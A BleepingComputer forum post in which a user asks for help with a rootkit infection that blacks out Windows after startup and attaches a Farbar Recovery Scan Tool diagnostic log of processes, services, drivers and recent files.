Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows turns black after startup (possible due to esvhnqcv.sys)


  • Please log in to reply
29 replies to this topic

#1 mortn

mortn

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 18 March 2018 - 12:34 PM

Hello!

It seems that I recently got infected with virus/malicious software on my desktop computer. Upon starting the computer and entering Windows, everything turns black after a few seconds, and I can't do anything other than turning the computer off (by pressing the Power button). In addition to this, a lot of programs seems to have installed themselves as well, although I am not sure if these are truly dangerous programs or just bloatware or something similar. They did, however, got installed at the same time as the infection. I think Malwarebytes Anti-Malware were also uninstalled by the event, but I am not sure at this point (since I reinstalled it to run some standard scans). My System Restore Points seems to have be removed as well. As off now, I have unplugged the Ethernet cable from the computer.

Since I can't really do anything in normal mode, I have tried some things in fail-safe mode (without network connection):

  • Running several full (and manually updated) Malwarebytes Anti-Malware scans (including root kits).
  • Running several full Microsoft Security Essential scans
  • Running Malwarebytes AdwCleaner
  • Running (and manually update (as best as I managed)) Spybot Search and Destroy 2.0
  • Running Malwarebytes Anti-Rootkit

I also tried to in normal mode start with just the basic startups via msconfig, but that did not change anything.

 

During the scans, several infected files where found and removed, all of which where located at the C-disk (Windows partition). Unfortunately, I did not save any of the logs. However, a certain "esvhnqcv.sys", labeled as a rootkit by Malwarebytes, were not successfully removed (despite several reboots) until I ran Malwarebytes Anti-Rootkit, after which all scans come up empty. Even though every Scan show up empty, I'm assuming that the system is in fact quite heavily infected.

 

Please note that the attached FRST-logs are from running the program in fail-safe mode, since I can't navigate windows long enough in normal mode to complete a scan.

 

I am at a loss here, since I really don't know how to approach this. I would be very grateful if anyone would offer their time and expertise. I will gladly make a donation for your help.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (18-03-2018 09:05:41)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dinotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Install Spybot - Search & Destroy] => "G:\spybotsd-2.6.46.exe"
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-02]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-02]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [File not signed]
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
S2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
S2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
S2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
S2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
S3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
S3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
S3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-18 09:03 - 2018-03-18 09:05 - 000000000 ____D C:\FRST
2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 10:21 - 2018-03-02 11:15 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-02 10:27 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 08:11 - 2018-03-02 11:15 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000000000 ____D C:\Windows\LastGood
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:14 - 2018-03-18 09:02 - 001178610 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:09 - 2018-03-01 17:09 - 000003060 _____ C:\Windows\System32\Tasks\OHurYzwpfZsLsh
